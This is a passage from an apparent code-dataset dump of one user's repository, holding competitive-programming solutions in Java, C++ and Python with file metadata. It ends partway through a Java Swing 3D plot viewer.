out.println(Arrays.toString(pow));\n // out.println(Arrays.toString(h));\n \n int l = 1, r = n;\n \n while (r - l > 1) {\n int c = (r + l) / 2;\n Pair ans = ans(str, pow, h, n, c, m);\n if (ans == null || ans.n < m) {\n r = c;\n } else {\n l = c;\n }\n }\n \n Pair y = ans(str, pow, h, n, r, m);\n \n if (y == null || y.n < m) {\n r = l;\n y = ans(str, pow, h, n, r, m);\n }\n \n if (y == null || y.n < m) {\n out.println(\"none\");\n } else {\n out.println(r + \" \" + y.r);\n }\n \n }\n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n String nextLine() {\n try {\n return br.readLine();\n } catch (IOException e) {\n return null;\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n st = new StringTokenizer(nextLine());\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new J().run();\n }\n}\n" }, { "alpha_fraction": 0.5046296119689941, "alphanum_fraction": 0.5266203880310059, "avg_line_length": 31, "blob_id": "ccb7fbde201976c9b22aad2610506c10982a5a55", "content_id": "e4fe48580b52640748b335978b6c04259444c543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3456, "license_type": "no_license", "max_line_length": 174, "num_lines": 108, 
"path": "/CodeForce/1634/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n map<array<int, 3>, int> cache;\n auto ask = [&](int i, int j, int k) {\n array<int, 3> q = {i, j, k};\n sort(all(q));\n if (cache.contains(q))\n return cache[q];\n\n writeln(\"?\", i + 1, j + 1, k + 1);\n ints(x);\n return cache[q] = x;\n };\n int mn = -1;\n int first = -1;\n FOR(i, 2, n)\n {\n int cur = ask(0, 1, i);\n if (cur > mn)\n mn = cur,\n first = i;\n }\n int mx = -1;\n int second = -1;\n FOR(i, 2, n)\n if (i != first)\n {\n int cur = ask(0, first, i);\n if (cur > mx)\n mx = cur,\n second = i;\n }\n int m = max(mx, mn);\n\n vector<int> indices = {0, 1, first, second};\n for (int x: indices)\n for (int y: indices)\n if (x != y)\n {\n bool ok = true;\n for (int z: indices)\n if (z != x && z != y)\n ok &= ask(x, y, z) == m;\n if (ok)\n return writeln(\"!\", x + 1, y + 1);\n\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 
0.41477271914482117, "alphanum_fraction": 0.4318181872367859, "avg_line_length": 33.599998474121094, "blob_id": "aee91e1bbef009b03b11fbefec84b052e916486b", "content_id": "19299e0c13f4ea2108ee8c08584f94e205aa8b0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 176, "license_type": "no_license", "max_line_length": 76, "num_lines": 5, "path": "/CodeForce/0675/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a, b, c = list(map(int, input().split()))\r\nif c == 0:\r\n print(\"YES\" if a == b else \"NO\")\r\nelse:\r\n print(\"YES\" if (((b - a) % c == 0) and (((b - a) // c) >= 0)) else \"NO\")" }, { "alpha_fraction": 0.4798143804073334, "alphanum_fraction": 0.4849188029766083, "avg_line_length": 20.989795684814453, "blob_id": "4c6d0226ef660dd35e6e1eb91bf6081acc2be0de", "content_id": "ffe230af5b9541878c60778ba100d0734fe26599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2155, "license_type": "no_license", "max_line_length": 85, "num_lines": 98, "path": "/2014/gcj2014_0/D.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef CASE_HPP\n#define CASE_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nclass Case : public QObject, public 
QRunnable\n{\n Q_OBJECT\n int x = 0, y = 0, n;\n vector<double> b, c;\n set<double> a;\n\npublic:\n void readInput(QTextStream &in)\n {\n in >> n;\n b.resize(n);\n double u;\n fori(n)\n in >> b[i];\n fori(n)\n in >> u,\n a.insert(u),\n c.pb(u);\n }\n\n void writeResults(QTextStream &out)\n {\n out << \"Case #\" << case_number << \": \";\n out << y << \" \" << x << \"\\n\";\n }\n\n void solution()\n {\n sort(b.begin(), b.end());\n sort(c.begin(), c.end());\n set<double>::iterator it;\n fori(n)\n {\n it = a.upper_bound(b[i]);\n if (it == a.end())\n x++;\n else\n a.erase(it);\n }\n int jc = n - 1;\n int ic = 0;\n forn(ib, n)\n {\n if (b[ib] < c[ic])\n jc--;\n else\n y++,\n ic++;\n }\n }\n\n explicit Case() : QObject(0), solved(false) { setAutoDelete(false); }\n\n void run()\n {\n solution();\n solved = true;\n emit caseSolved(this);\n }\n\n inline bool is_solved() const { return solved; }\n inline void setCaseNumber(int n) { case_number = n; }\n\nsignals:\n void caseSolved(Case*);\n\nprivate:\n int case_number;\n bool solved;\n};\n\n#endif // CASE_HPP\n" }, { "alpha_fraction": 0.45350733399391174, "alphanum_fraction": 0.4671696722507477, "avg_line_length": 31.476821899414062, "blob_id": "48627037d57359e7b79341eed999bee1c7db61bc", "content_id": "ffddcef2c6cc5c76892ea0b8c53fa1daf08fae07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4904, "license_type": "no_license", "max_line_length": 174, "num_lines": 151, "path": "/CodeForce/1786/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvector<tuple<string, string, string, string, char, char>> swaps;\n\nvoid run()\n{\n ints(n);\n vector<string> s(n);\n readln(s);\n map<string, set<int>> m;\n fori(n)\n sort(all(s[i])),\n m[s[i]].insert(i);\n\n auto del = [&](string i, int j) {\n m[i].erase(j);\n if (m[i].empty())\n m.erase(i);\n };\n vector<pair<pair<int, char>, pair<int, char>>> ans;\n while (SZ(m) > 1)\n {\n for (auto& [f, t, nf, nt, c, d]: swaps)\n if (m.contains(f) && m.contains(t))\n {\n int i = *m[f].begin();\n int j = *m[t].begin();\n del(f, i);\n del(t, j);\n\n m[nf].insert(i);\n m[nt].insert(j);\n ans.pb({{i + 1, c}, {j + 1, d}});\n break;\n }\n }\n\n writeln(ans.size());\n if (ans.size())\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n set<tuple<string, string, string, string, char, char>> swapsGood, swapsBad;\n set<string> strings;\n fori(3)\n forj(3)\n forn(k, 3)\n {\n string t;\n t.pb(\"win\"[i]);\n t.pb(\"win\"[j]);\n t.pb(\"win\"[k]);\n sort(all(t));\n strings.insert(t);\n }\n\n auto get = [&](const string& s) {\n set<char> ans(all(s));\n return ans.size();\n };\n\n for (string f: strings)\n for (string t: strings)\n {\n int wf = get(f);\n int wt = get(t);\n fori(3)\n forj(3)\n if (f[i] != t[j])\n {\n string nf(f);\n string nt(t);\n nf[i] = t[j];\n nt[j] = f[i];\n sort(all(nf));\n sort(all(nt));\n int qf = get(nf);\n int qt = get(nt);\n if (wf == qf && wt == qt)\n continue;\n if (wf > qf || wt > qt)\n continue;\n if (f == nt && t == nf)\n continue;\n if (wf < qf && wt < qt)\n swapsGood.insert({f, t, nf, nt, f[i], t[j]});\n else if (wf < qf || wt < qt)\n swapsBad.insert({f, t, nf, nt, f[i], t[j]});\n }\n }\n for (auto& x: swapsGood)\n swaps.pb(x);\n for (auto& x: swapsBad)\n swaps.pb(x);\n\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() 
/ CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.42735734581947327, "alphanum_fraction": 0.4467826783657074, "avg_line_length": 33.31944274902344, "blob_id": "3b35b7e7495ec5bc4c3967338da1fdbfb44cb62a", "content_id": "6f4605ddab46d84364e823c7057d18499f5dd184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2471, "license_type": "no_license", "max_line_length": 928, "num_lines": 72, "path": "/CodeForce/0285/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b;\nvector<long long> fac;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int 
b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n\n fac.push_back(1);\n fac.push_back(1);\n for (int i = 2; i < 17; i++)\n fac.push_back(fac[i - 1] * i);\n// for (int i = 1; i < 17; i++)\n long long ans = 0;\n //for (int i = 1; i <= 15; i = i + 2)\n b.resize(16 + 1);\n vector<bool> d;\n int i = 13;\n {\n a.clear();\n for (int s = 1; s <= i; s++)\n a.push_back(s);\n ans = 0;\n for (int q = 1; q <= i; q++)\n b[q - 1] = q;\n for (long long q = 1; q <= fac[i]; q++)\n {\n d.clear();\n d.resize(i + 2, false);\n bool f = true;\n for (int w = 0; w < i; w++)\n if (d[(a[w] - 1 + b[w] - 1) % i + 1])\n {\n f = false;\n break;\n } else\n d[(a[w] - 1 + b[w] - 1) % i + 1] = true;\n if (f)\n ans++;\n next_permutation(b.begin(), b.begin() + i);\n }\n printf(\"%I64d \", ans);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.29866665601730347, "alphanum_fraction": 0.37066665291786194, "avg_line_length": 17.75, "blob_id": "46c307fd668bc2ed0254b694043ac6b4afd2fd5a", "content_id": "8c4290f8bb1f997333b9067d492685c3549dd756", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", 
"max_line_length": 38, "num_lines": 20, "path": "/CodeForce/0626/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nn, m = list(map(int, input().split()))\ni = k2 = k3 = k6 = 0\nprint(n, m, i, k2, k3, k6)\nwhile True:\n i += 1\n if i % 6 == 0:\n k6 += 1\n else:\n if i % 3 == 0:\n k3 += 1\n if i % 2 == 0:\n k2 += 1\n k2 = min(n, k2)\n k3 = min(m, k3)\n need = n - k2 + m - k3\n if need <= k6:\n print(i)\n sys.exit()\n" }, { "alpha_fraction": 0.49741899967193604, "alphanum_fraction": 0.5271828770637512, "avg_line_length": 25.77941131591797, "blob_id": "25ef9c288052fdc1bef3a83ffe6fe9ac837486d6", "content_id": "63bbdfa4922084a71b7d2243ffbd9af43c762fc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9105, "license_type": "no_license", "max_line_length": 111, "num_lines": 340, "path": "/Ann/java2/PlotViewer.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.awt.KeyEventDispatcher;\nimport java.awt.KeyboardFocusManager;\nimport java.awt.event.KeyEvent;\nimport java.awt.image.BufferedImage;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Locale;\n\nimport javax.swing.ImageIcon;\nimport javax.swing.JFrame;\nimport javax.swing.JLabel;\nimport javax.swing.JPanel;\n\npublic class PlotViewer extends JFrame {\n\n\tList<Plot3D> plots;\n\n\tprivate static final long serialVersionUID = 0xe1a_9353;\n\tfinal static double PI180 = Math.PI / 180.0;\n\n\tint width, height;\n\n\tdouble ax, ay, az;\n\tdouble bx, by, bz;\n\tdouble cx, cy, cz;\n\tdouble dx, dy, dz;\n\tdouble mx, my, mz;\n\n\tint horizontalAngle = 46;\n\tint verticalAngle = 40;\n\n\tdouble zoom = 32;\n\tdouble logZoom = 5;\n\n\tdouble angleOfView = 32;\n\tdouble logAngleOfView = 5;\n\n\tdouble speed = 1.0;\n\tdouble logSpeed = 0;\n\n\tint[] black;\n\tdouble[][] depth;\n\tBufferedImage canvas;\n\tJLabel jLabel = new JLabel();\n\n\tvoid onResize() {\n\t\twidth = getWidth();\n\t\theight = 
getHeight();\n\n\t\tsetTitle(\"[R] <screen resized> \" + width + \"x\" + height);\n\n\t\tcanvas = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);\n\t\tdepth = new double[width][height];\n\t\tblack = new int[width * height];\n\t\tArrays.fill(black, 0xFF000000);\n\t\tjLabel.setIcon(new ImageIcon(canvas));\n\t\tdrawPlot();\n\t}\n\n\tvoid debugVector(double sx, double sy, double sz, double fx, double fy, double fz) {\n\t\tSystem.out.println(String.format(Locale.ENGLISH, \"(%.2f,%.2f,%.2f:%.2f,%.2f,%.2f)\", sx, sy, sz, fx, fy, fz));\n\t}\n\n\tvoid clearCanvas() {\n\t\tcanvas.setRGB(0, 0, width, height, black, 0, width);\n\t\tfor (double[] dd : depth) {\n\t\t\tArrays.fill(dd, Double.POSITIVE_INFINITY);\n\t\t}\n\t}\n\n\tvoid moveVectors() {\n\t\tax += mx;\n\t\tbx += mx;\n\t\tcx += mx;\n\t\tdx += mx;\n\n\t\tay += my;\n\t\tby += my;\n\t\tcy += my;\n\t\tdy += my;\n\n\t\taz += mz;\n\t\tbz += mz;\n\t\tcz += mz;\n\t\tdz += mz;\n\t}\n\n\tvoid calculateDirectionVectors() {\n\t\tax = bx - Math.sin((90 - verticalAngle) * PI180) * Math.cos(horizontalAngle * PI180);\n\t\tay = by - Math.sin((90 - verticalAngle) * PI180) * Math.sin(horizontalAngle * PI180);\n\t\taz = bz - Math.cos((90 - verticalAngle) * PI180);\n\n\t\tif (verticalAngle == 0) {\n\t\t\tcx = bx;\n\t\t\tcy = by;\n\t\t\tcz = bz + 1;\n\t\t} else if (verticalAngle == 90) {\n\t\t\tcx = bx - Math.cos(horizontalAngle * PI180);\n\t\t\tcy = by - Math.sin(horizontalAngle * PI180);\n\t\t\tcz = bz;\n\t\t} else if (verticalAngle == -90) {\n\t\t\tcx = bx + Math.cos(horizontalAngle * PI180);\n\t\t\tcy = by + Math.sin(horizontalAngle * PI180);\n\t\t\tcz = bz;\n\t\t} else {\n\t\t\tdouble ex = ax, ey = ay, ez = az + 1.0;\n\n\t\t\tdouble f = (by * ez - bz * ey) + (az * ey - ay * ez) + (ay * bz - az * by);\n\t\t\tdouble g = -((bx * ez - bz * ex) + (az * ex - ax * ez) + (ax * bz - az * bx));\n\t\t\tdouble h = (bx * ey - by * ex) + (ay * ex - ax * ey) + (ax * by - ay * bx);\n\t\t\tdouble q = ax * (by * ez - bz * ey) - ay * (bx * 
ez - bz * ex) + az * (bx * ey - by * ex);\n\n\t\t\tdouble w = ax - bx;\n\t\t\tdouble u = ay - by;\n\t\t\tdouble v = az - bz;\n\t\t\tdouble t = bx * (ax - bx) + by * (ay - by) + bz * (az - bz);\n\n\t\t\tdouble a1 = (v * g - h * u) / (f * u - g * w);\n\t\t\tdouble b1 = (q * u - g * t) / (f * u - g * w);\n\n\t\t\tdouble a2 = (h * w - v * f) / (f * u - g * w);\n\t\t\tdouble b2 = (f * t - q * w) / (f * u - g * w);\n\n\t\t\tdouble da = a1 * a1 + a2 * a2 + 1;\n\t\t\tdouble db = a1 * (b1 - bx) + a2 * (b2 - by) - bz;\n\t\t\tdouble dc = (b1 - bx) * (b1 - bx) + (b2 - by) * (b2 - by) + bz * bz - 1;\n\n\t\t\tcz = (Math.sqrt(db * db - da * dc) - db) / da;\n\t\t\tcx = a1 * cz + b1;\n\t\t\tcy = a2 * cz + b2;\n\t\t}\n\n\t\tdx = bx + (ay - by) * (cz - bz) - (az - bz) * (cy - by);\n\t\tdy = by + (az - bz) * (cx - bx) - (ax - bx) * (cz - bz);\n\t\tdz = bz + (ax - bx) * (cy - by) - (ay - by) * (cx - bx);\n\t}\n\n\tvoid fillCanvas() {\n\n\t\tdouble m11 = cx - bx, m12 = dx - bx, m13 = ax - bx;\n\t\tdouble m21 = cy - by, m22 = dy - by, m23 = ay - by;\n\t\tdouble m31 = cz - bz, m32 = dz - bz, m33 = az - bz;\n\n\t\tfor (Plot3D plot : plots) {\n\t\t\tfor (int p = 0; p < plot.size; p++) {\n\t\t\t\tdouble x = m12 * (plot.x[p] - bx) + m22 * (plot.y[p] - by) + m32 * (plot.z[p] - bz);\n\t\t\t\tdouble y = m11 * (plot.x[p] - bx) + m21 * (plot.y[p] - by) + m31 * (plot.z[p] - bz);\n\t\t\t\tdouble z = m13 * (plot.x[p] - bx) + m23 * (plot.y[p] - by) + m33 * (plot.z[p] - bz);\n\n\t\t\t\tif (z > 0) {\n\t\t\t\t\tdouble scale = (z + angleOfView) / (angleOfView * zoom);\n\n\t\t\t\t\tx /= scale;\n\t\t\t\t\ty /= scale;\n\n\t\t\t\t\tx += canvas.getWidth() / 2;\n\t\t\t\t\ty += canvas.getHeight() / 2;\n\n\t\t\t\t\tif (x >= 0 && x < canvas.getWidth() && y >= 0 && y < canvas.getHeight() && z < depth[(int) x][(int) y]) {\n\n\t\t\t\t\t\tdepth[(int) x][(int) y] = z;\n\n\t\t\t\t\t\tscale = (0.5 + 0.5 / (z + 1.0));\n\n\t\t\t\t\t\tint red = (int) ((0xFF & (plot.color[p] >> 16)) * scale);\n\t\t\t\t\t\tint green = (int) 
((0xFF & (plot.color[p] >> 8)) * scale);\n\t\t\t\t\t\tint blue = (int) ((0xFF & (plot.color[p] >> 0)) * scale);\n\n\t\t\t\t\t\tcanvas.setRGB((int) x, canvas.getHeight() - (int) y - 1, 0xFF000000 | (red << 16) | (green << 8) | blue);\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\n\t}\n\n\tvoid drawPlot() {\n\t\tclearCanvas();\n\t\tfillCanvas();\n\t\trepaint();\n\t}\n\n\tpublic PlotViewer(List<Plot3D> plots) {\n\t\tthis.plots = plots;\n\t\tsetBounds(100, 0, 640, 480);\n\n\t\tcalculateDirectionVectors();\n\t\tonResize();\n\n\t\tJPanel jPanel = new JPanel();\n\t\tjPanel.add(jLabel);\n\t\tadd(jPanel);\n\n\t\tKeyboardFocusManager manager = KeyboardFocusManager.getCurrentKeyboardFocusManager();\n\t\tmanager.addKeyEventDispatcher(new KeyEventDispatcher() {\n\n\t\t\t@Override\n\t\t\tpublic boolean dispatchKeyEvent(KeyEvent e) {\n\t\t\t\tif (e.getID() == KeyEvent.KEY_PRESSED) {\n\n\t\t\t\t\tswitch (e.getKeyCode()) {\n\t\t\t\t\tcase 'R':\n\t\t\t\t\t\tonResize();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 32: // SPACE\n\t\t\t\t\t\tmx = speed * (ax - bx);\n\t\t\t\t\t\tmy = speed * (ay - by);\n\t\t\t\t\t\tmz = speed * (az - bz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[SPACE] <move forward> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 16: // SHIFT\n\t\t\t\t\t\tmx = speed * (bx - ax);\n\t\t\t\t\t\tmy = speed * (by - ay);\n\t\t\t\t\t\tmz = speed * (bz - az);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[SHIFT] <move backward> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 37: // LEFT\n\t\t\t\t\t\tmx = speed * (bx - dx);\n\t\t\t\t\t\tmy = speed * (by - dy);\n\t\t\t\t\t\tmz = speed * (bz - dz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[LEFT] <move left> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 39: // RIGHT\n\t\t\t\t\t\tmx = speed * (dx - 
bx);\n\t\t\t\t\t\tmy = speed * (dy - by);\n\t\t\t\t\t\tmz = speed * (dz - bz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[RIGHT] <move right> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 38: // UP\n\t\t\t\t\t\tmx = speed * (cx - bx);\n\t\t\t\t\t\tmy = speed * (cy - by);\n\t\t\t\t\t\tmz = speed * (cz - bz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[UP] <move up> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 40: // DOWN\n\t\t\t\t\t\tmx = speed * (bx - cx);\n\t\t\t\t\t\tmy = speed * (by - cy);\n\t\t\t\t\t\tmz = speed * (bz - cz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[DOWN] <move down> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 'W':\n\t\t\t\t\t\tverticalAngle = Math.max(-90, verticalAngle - 2);\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[W] <turn up> \" + verticalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'S':\n\t\t\t\t\t\tverticalAngle = Math.min(90, verticalAngle + 2);\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[S] <turn down> \" + verticalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'A':\n\t\t\t\t\t\thorizontalAngle = (362 + horizontalAngle) % 360;\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[A] <turn left> \" + horizontalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'D':\n\t\t\t\t\t\thorizontalAngle = (358 + horizontalAngle) % 360;\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[D] <turn right> \" + horizontalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'Q':\n\t\t\t\t\t\tlogSpeed = Math.max(logSpeed - 1.0, -4.0);\n\t\t\t\t\t\tspeed = 